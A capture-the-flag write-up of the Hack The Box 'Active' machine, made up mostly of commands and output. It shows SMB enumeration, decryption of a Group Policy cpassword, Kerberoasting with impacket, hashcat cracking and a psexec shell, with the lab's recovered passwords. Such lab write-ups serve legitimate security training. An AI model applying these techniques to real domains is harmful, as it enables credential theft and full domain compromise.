Active
Contents
Port scan
root@kali:~/HTB/Machines/Active# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.100 --rate=1000
Starting masscan 1.0.5 at 2019-12-03 19:49:39 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 61581/udp on 10.10.10.100 Discovered open port 389/tcp on 10.10.10.100 Discovered open port 139/tcp on 10.10.10.100 Discovered open port 9389/tcp on 10.10.10.100 Discovered open port 49154/tcp on 10.10.10.100 Discovered open port 61157/udp on 10.10.10.100 Discovered open port 49158/tcp on 10.10.10.100 Discovered open port 53/udp on 10.10.10.100 Discovered open port 3269/tcp on 10.10.10.100 Discovered open port 49169/tcp on 10.10.10.100 Discovered open port 445/tcp on 10.10.10.100 Discovered open port 5722/tcp on 10.10.10.100 Discovered open port 49155/tcp on 10.10.10.100 Discovered open port 3268/tcp on 10.10.10.100 Discovered open port 464/tcp on 10.10.10.100 Discovered open port 49157/tcp on 10.10.10.100 Discovered open port 135/tcp on 10.10.10.100 Discovered open port 47001/tcp on 10.10.10.100 Discovered open port 60900/udp on 10.10.10.100 Discovered open port 88/tcp on 10.10.10.100 Discovered open port 49171/tcp on 10.10.10.100 Discovered open port 636/tcp on 10.10.10.100 Discovered open port 53/tcp on 10.10.10.100 Discovered open port 49182/tcp on 10.10.10.100 Discovered open port 49152/tcp on 10.10.10.100 Discovered open port 593/tcp on 10.10.10.100 Discovered open port 60785/udp on 10.10.10.100 Discovered open port 49153/tcp on 10.10.10.100
root@kali:~/HTB/Machines/Active# nmap -sC -sV 10.10.10.100 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-03 14:50 EST Nmap scan report for active.htb (10.10.10.100) Host is up (0.043s latency). Not shown: 983 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-12-03 19:50:54Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open tcpwrapped 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results: |_clock-skew: 2s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2019-12-03T19:51:49 |_ start_date: 2019-12-03T19:14:25
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 190.91 seconds
Active directory enumeration
Simple smbclient anonymous enumeration
root@kali:~/HTB/Machines/Active# smbclient -L //10.10.10.100 Enter WORKGROUP\root's password: Anonymous login successful
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Replication Disk SYSVOL Disk Logon server share Users Disk SMB1 disabled -- no workgroup available
Nullinux setup
root@kali:~/HTB/Utils# git clone https://github.com/m8r0wn/nullinux Cloning into 'nullinux'... remote: Enumerating objects: 63, done. remote: Counting objects: 100% (63/63), done. remote: Compressing objects: 100% (51/51), done. remote: Total 383 (delta 27), reused 16 (delta 6), pack-reused 320 Receiving objects: 100% (383/383), 89.01 KiB | 1.20 MiB/s, done. Resolving deltas: 100% (205/205), done. root@kali:~/HTB/Utils# cd nullinux/ root@kali:~/HTB/Utils/nullinux# ./setup.sh
[*] Starting nullinux setup script Collecting ipparser (from -r requirements.txt (line 1)) Downloading https://files.pythonhosted.org/packages/d3/9d/aeaa797f7278c6dca39b6878a252b03e70cd09a2b956f56bfdcc186cc9ba/ipparser-0.3.5.tar.gz Requirement already satisfied: dnspython in /usr/lib/python3/dist-packages (from ipparser->-r requirements.txt (line 1)) (1.16.0) Building wheels for collected packages: ipparser Running setup.py bdist_wheel for ipparser ... done Stored in directory: /root/.cache/pip/wheels/02/2c/c5/ab538902253acfd931309bbcb10ab441e6b67a0e944802b206 Successfully built ipparser Installing collected packages: ipparser Successfully installed ipparser-0.3.5 [*] Checking for smbclient [+] smbclient installed
[*] nullinux setup complete
Nullinux enumeration
root@kali:~/HTB/Machines/Active# python3 ../../Utils/nullinux/nullinux.py -v 10.10.10.100
Starting nullinux v5.4.1 | 01-05-2020 14:08
[*] Enumerating Shares for: 10.10.10.100 Shares Comments ------------------------------------------- \\10.10.10.100\ADMIN$ Remote Admin \\10.10.10.100\C$ Default share \\10.10.10.100\IPC$ \\10.10.10.100\NETLOGON Logon server share \\10.10.10.100\Replication \\10.10.10.100\SYSVOL Logon server share \\10.10.10.100\Users
[*] Enumerating: \\10.10.10.100\ADMIN$ [-] tree connect failed: NT_STATUS_ACCESS_DENIED
[*] Enumerating: \\10.10.10.100\C$ [-] tree connect failed: NT_STATUS_ACCESS_DENIED
[*] Enumerating: \\10.10.10.100\IPC$ [-] NT_STATUS_ACCESS_DENIED listing \*
[*] Enumerating: \\10.10.10.100\NETLOGON [-] tree connect failed: NT_STATUS_ACCESS_DENIED
[*] Enumerating: \\10.10.10.100\Replication . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 active.htb D 0 Sat Jul 21 06:37:44 2018
[*] Enumerating: \\10.10.10.100\SYSVOL [-] tree connect failed: NT_STATUS_ACCESS_DENIED
[*] Enumerating: \\10.10.10.100\Users [-] tree connect failed: NT_STATUS_ACCESS_DENIED
[*] Enumerating Domain Information for: 10.10.10.100 [-] Could not attain Domain SID
[*] Enumerating querydispinfo for: 10.10.10.100
[*] Enumerating enumdomusers for: 10.10.10.100
[*] Enumerating LSA for: 10.10.10.100
[*] Performing RID Cycling for: 10.10.10.100 [-] RID Failed: Could not attain Domain SID
[*] Testing 10.10.10.100 for Known Users
[*] Enumerating Group Memberships for: 10.10.10.100
[*] 0 unique user(s) identified
root@kali:~/HTB/Machines/Active/smbclient/Replication# smbclient \\\\10.10.10.100\\Replication Enter WORKGROUP\root's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \> dir . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 active.htb D 0 Sat Jul 21 06:37:44 2018
10459647 blocks of size 4096. 4931606 blocks available smb: \> cd active.htb smb: \active.htb\> dir . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018 Policies D 0 Sat Jul 21 06:37:44 2018 scripts D 0 Wed Jul 18 14:48:57 2018
10459647 blocks of size 4096. 4931606 blocks available smb: \active.htb\> prompt smb: \active.htb\> recurse smb: \active.htb\> mget * getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.7 KiloBytes/sec) (average 0.4 KiloBytes/sec) getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (6.1 KiloBytes/sec) (average 2.3 KiloBytes/sec) getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2.9 KiloBytes/sec) (average 2.4 KiloBytes/sec) getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (15.3 KiloBytes/sec) (average 5.0 KiloBytes/sec) getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 4.2 KiloBytes/sec) getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (20.4 KiloBytes/sec) (average 6.5 KiloBytes/sec)
group.xml file
root@kali:~/HTB/Machines/Active/smbclient/Replication# find -type f
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
In the files downloaded, there is an interresting file group.xml
root@kali:~/HTB/Machines/Active/smbclient/Replication# cat "./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml"
<?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Cpassword from group.xml
In the Openspecification of Microsoft, we can find that the group.xml contains the user and the password of accounts services. The password is encrypted but the AES key is public.
root@kali:~/HTB/Utils# git clone https://github.com/PowerShellMafia/PowerSploit root@kali:~/HTB/Utils# cd PowerSploit/Exfiltration'Bold text' root@kali:~/HTB/Utils/PowerSploit/Exfiltration# view Get-GPPPassword.ps1
Powershell script
Inspiring in that script, this routine will decrypt the Cpassword of the group.xml file.
root@kali:~/HTB/Machines/Active# cat Get-DecryptedCpassword.ps1
function Get-DecryptedCpassword {
Param (
[string] $Cpassword
)
try {
#Append appropriate padding based on string length
$Mod = ($Cpassword.length % 4)
switch ($Mod) {
'1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
'2' {$Cpassword += ('=' * (4 - $Mod))}
'3' {$Cpassword += ('=' * (4 - $Mod))}
}
$Base64Decoded = [Convert]::FromBase64String($Cpassword)
#Create a new AES .NET Crypto Object
$AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
[Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
#Set IV to all nulls to prevent dynamic generation of IV value
$AesIV = New-Object Byte[]($AesObject.IV.Length)
$AesObject.IV = $AesIV
$AesObject.Key = $AesKey
$DecryptorObject = $AesObject.CreateDecryptor()
[Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
}
catch {Write-Error $Error[0]}
}
Get-DecryptedCpassword 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
The execution of the routine provides the password of the service user.
root@kali:~/HTB/Machines/Active# pwsh PowerShell 6.2.3 Copyright (c) Microsoft Corporation. All rights reserved.
https://aka.ms/pscore6-docs Type 'help' to get help.
PS /root/HTB/Machines/Active> . ./Get-DecryptedCpassword.ps1 GPPstillStandingStrong2k18 PS /root/HTB/Machines/Active> exit
Alternative way with gpp-decrypt
An other way to decrypt the password is to use the command gpp-decrypt.
root@kali:~/HTB/Machines/Active# gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18
The gpp-decrypt is a Ruby script included in Kali.
Alternative way manually with openssl
The password is encoded in base 64, but if we try to decode it, there is an error, because the padding is not correct. Adding padding characters (in base64 the padding character can be 1 or 2 =).
root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" | base64 -d 1>/dev/null base64: invalid input root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ=" | base64 -d 1>/dev/null base64: invalid input root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==" | base64 -d 1>/dev/null
The binary content is decoded with openssl providing the Microsoft's key. And the IV (initialization vector) set to 0.
root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==" | base64 -d | openssl aes-256-cbc -d -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0
hex string is too short, padding with zero bytes to length
GPPstillStandingStrong2k18
The base64 decode can be avoided with the modifier -a
root@kali:~/HTB/Machines/Active# echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==" | openssl aes-256-cbc -d -a -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0
hex string is too short, padding with zero bytes to length
GPPstillStandingStrong2k18
User Flag
root@kali:~/HTB/Machines/Active# smbclient \\\\10.10.10.100\\Users -U SVC_TGS Enter WORKGROUP\SVC_TGS's password: Try "help" to get a list of possible commands. smb: \> get SVC_TGS\Desktop\user.txt getting file \SVC_TGS\Desktop\user.txt of size 34 as SVC_TGS\Desktop\user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) smb: \> exit root@kali:~/HTB/Machines/Active# cat SVC_TGS\\Desktop\\user.txt <USER_FLAG>
Kerberoasting
Kerberoasting takes advantage of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs). With the service account, Kerberoasting allows us to crack passwords for those accounts. By logging into an Active Directory domain as any authenticated user, we are able to request service tickets (TGS) for service accounts by specifying their SPN value. Active Directory will return an encrypted ticket, which is encrypted using the NTLM hash of the account that is associated with that SPN. You can then brute force these service tickets until successfully cracked, with no risk of detection or account lockouts. Once cracked, you have the service account password in plain text.
Install impackt tools
root@kali:~/HTB/Utils# git clone https://github.com/SecureAuthCorp/impacket.git Cloning into 'impacket'... remote: Enumerating objects: 29, done. remote: Counting objects: 100% (29/29), done. remote: Compressing objects: 100% (24/24), done. remote: Total 17215 (delta 9), reused 13 (delta 5), pack-reused 17186 Receiving objects: 100% (17215/17215), 5.71 MiB | 18.16 MiB/s, done. Resolving deltas: 100% (13131/13131), done.
root@kali:~/HTB/Utils# cd impacket/ root@kali:~/HTB/Utils/impacket# python setup.py install
Retrieve SPN tickets
root@kali:~/HTB/Machines/Active# ../../Utils/impacket/examples/GetUserSPNs.py -request active.htb/SVC_TGS -outputfile SPN2hashcat Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password: ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2018-07-30 13:17:40.656520
The tool has retreived the ticket in hashcat format.
root@kali:~/HTB/Machines/Active# cat SPN2hashcat $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$66be5612a75e8b848bee009cc6f1cd3d$0704e0568964fb5f33d76802ac1365a34bc12a1b6db6df1aa5c534a4a23fd377c00790dd615acc790bb1e43498d256cc5b85fb9b2dc500c96a268858ca14599f3750356054bcce04e04e50ef3d4f2b4dd43d18b868ad4db1865e3088c30ebd7079e8356fb74cf02c8635c143c13b640bd9cf641c858444ab2448351e1bbd52fa7352010a2d362b4d7a8d4f5fe35aab9ae2ca69057edad31eb350493f2ecfc359e16406c885ffde8b9252eb8a19e02c4b453e23534b23ba62776516cab94efb3e690d5761af91c756bab200330057347a33c99a55d4522dd80d72be52d805749f11a6b10c10be450087fbc3eab2efef26e4d21eff2c0a338589e090900d5ff5d0fef4bb07a2fc11387e056a36da505e9093d65f14d24b8fa711eb8a24307b3f6111844678c1a37394a2710f4feaf0e60506ee4b94314e209b1ddd62e52bd1bb16e758d0cc0a06f03c3decc79e5db686085987ac8c04e8e8a8e6e80e50ad67023c4495d185d6b0555a9921b6217d52e2a822a5ec9243d56667f0d02a826d1101b0ee8f6e3e43ef9f1776e846dc5265f150fff46c643540b8e2eed66c70c3af8ed8c3d44c82c0c70ce569b3bd584ca41920cce2285055134baec2fe3e368834baa83dbf3c550ed918581fd73920efc22b2a3f454ecf7446adf0fd0ae0c970149ee75c98b453ee666989716b4e876bce3ee998c3d215cf0df3350ab92536e8a4f153e72e46ab01a76159e46f2d68c5a836ffde9e24f8b58bb72f84acc13f6fc745f6247e3ed2200b99752da6eeead1b5c30a4cdd1448fd6ca8b41f9bc68b150a2118df7080ba6739f7c68b33e73b17fbd9d0797bfe2f0dcc083cf011f248a22d04f4359376eb1effa89f052be0841ca69022a09d07381856953fa6717c7187b0a302d1b3c582000dbac6c91c83759fb812c66e7d7ffb35552b3b9015b5c9de93bfb33867792a54616a9aed330dfefe79cf3ceeca5df6d46ca2e8c6adf3e6165e922f6c8adb76e3231fba3e00294d72de9041ae048b97364b68d601210a76703e23fbbb972ca952feb34ea1f25b30ba412896d35131effb417dd37184e0f5523a62668c060c9fa57020ca8774be4f624841307bfa76185fd9327f22cf914cd4df65c85f2e941e90dc798ce2626d82e901abfe7ea85b868600ee91be0fd241dfbf942f3e0dc34a0a3485feccf2ff13e788414a7d665d0568fcc67a08836e0e06bdb62f925269d32d3d0ef509790bdf11b38065b97052b108128b646388
Crack the ticket
root@kali:~/HTB/Machines/Active# hashcat -m 13100 SPN2hashcat --force /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 2048/5878 MB allocatable, 8MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1
Applicable optimizers: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=13100 -D _unroll' Dictionary cache hit: * Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt * Passwords.: 14344384 * Bytes.....: 139921497 * Keyspace..: 14344384
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat Status...........: Running Hash.Type........: Kerberos 5 TGS-REP etype 23 Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...646388 Time.Started.....: Tue Jan 21 16:49:17 2020 (8 secs) Time.Estimated...: Tue Jan 21 16:49:32 2020 (7 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 911.8 kH/s (7.53ms) @ Accel:32 Loops:1 Thr:64 Vec:8 Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts Progress.........: 7798784/14344384 (54.37%) Rejected.........: 0/7798784 (0.00%) Restore.Point....: 7798784/14344384 (54.37%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: grega001 -> gooooal
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$66be5612a75e8b848bee009cc6f1cd3d$0704e0568964fb5f33d76802ac1365a34bc12a1b6db6df1aa5c534a4a23fd377c00790dd615acc790bb1e43498d256cc5b85fb9b2dc500c96a268858ca14599f3750356054bcce04e04e50ef3d4f2b4dd43d18b868ad4db1865e3088c30ebd7079e8356fb74cf02c8635c143c13b640bd9cf641c858444ab2448351e1bbd52fa7352010a2d362b4d7a8d4f5fe35aab9ae2ca69057edad31eb350493f2ecfc359e16406c885ffde8b9252eb8a19e02c4b453e23534b23ba62776516cab94efb3e690d5761af91c756bab200330057347a33c99a55d4522dd80d72be52d805749f11a6b10c10be450087fbc3eab2efef26e4d21eff2c0a338589e090900d5ff5d0fef4bb07a2fc11387e056a36da505e9093d65f14d24b8fa711eb8a24307b3f6111844678c1a37394a2710f4feaf0e60506ee4b94314e209b1ddd62e52bd1bb16e758d0cc0a06f03c3decc79e5db686085987ac8c04e8e8a8e6e80e50ad67023c4495d185d6b0555a9921b6217d52e2a822a5ec9243d56667f0d02a826d1101b0ee8f6e3e43ef9f1776e846dc5265f150fff46c643540b8e2eed66c70c3af8ed8c3d44c82c0c70ce569b3bd584ca41920cce2285055134baec2fe3e368834baa83dbf3c550ed918581fd73920efc22b2a3f454ecf7446adf0fd0ae0c970149ee75c98b453ee666989716b4e876bce3ee998c3d215cf0df3350ab92536e8a4f153e72e46ab01a76159e46f2d68c5a836ffde9e24f8b58bb72f84acc13f6fc745f6247e3ed2200b99752da6eeead1b5c30a4cdd1448fd6ca8b41f9bc68b150a2118df7080ba6739f7c68b33e73b17fbd9d0797bfe2f0dcc083cf011f248a22d04f4359376eb1effa89f052be0841ca69022a09d07381856953fa6717c7187b0a302d1b3c582000dbac6c91c83759fb812c66e7d7ffb35552b3b9015b5c9de93bfb33867792a54616a9aed330dfefe79cf3ceeca5df6d46ca2e8c6adf3e6165e922f6c8adb76e3231fba3e00294d72de9041ae048b97364b68d601210a76703e23fbbb972ca952feb34ea1f25b30ba412896d35131effb417dd37184e0f5523a62668c060c9fa57020ca8774be4f624841307bfa76185fd9327f22cf914cd4df65c85f2e941e90dc798ce2626d82e901abfe7ea85b868600ee91be0fd241dfbf942f3e0dc34a0a3485feccf2ff13e788414a7d665d0568fcc67a08836e0e06bdb62f925269d32d3d0ef509790bdf11b38065b97052b108128b646388:Ticketmaster1968
Session..........: hashcat Status...........: Cracked Hash.Type........: Kerberos 5 TGS-REP etype 23 Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...646388 Time.Started.....: Tue Jan 21 16:49:17 2020 (11 secs) Time.Estimated...: Tue Jan 21 16:49:28 2020 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 910.2 kH/s (7.47ms) @ Accel:32 Loops:1 Thr:64 Vec:8 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 10551296/14344384 (73.56%) Rejected.........: 0/10551296 (0.00%) Restore.Point....: 10534912/14344384 (73.44%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: Tiona172 -> TUGGAB8
Started: Tue Jan 21 16:49:16 2020 Stopped: Tue Jan 21 16:49:29 2020
The Administrator password is Ticketmaster1968
Root flag
We run a psexec with impact script
root@kali:~/HTB/Machines/Active# ../../Utils/impacket/examples/psexec.py Administrator@active.htb Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password: [*] Requesting shares on active.htb..... [*] Found writable share ADMIN$ [*] Uploading file TkGvHmKO.exe [*] Opening SVCManager on active.htb..... [*] Creating service Lecg on active.htb..... [*] Starting service Lecg..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop>type root.txt <ROOT_FLAG>
C:\Users\Administrator\Desktop>exit [*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0 [*] Opening SVCManager on active.htb..... [*] Stopping service Lecg..... [*] Removing service Lecg..... [*] Removing file TkGvHmKO.exe.....
References
- nullinux Internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB
- https://www.pentestpartners.com/security-blog/abusing-group-policy-preferences-to-elevate-privileges/
- docs Open Specifications -> Preferences Policy File Format -> Password Encryption
- Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
- PowerSploit - A PowerShell Post-Exploitation Framework
- Writing hex values to a file (not as ascii values) via the command line
- Kerberoasting - Part 1 2 and 3
Daniel Simao 11:43, 5 January 2020 (EST)
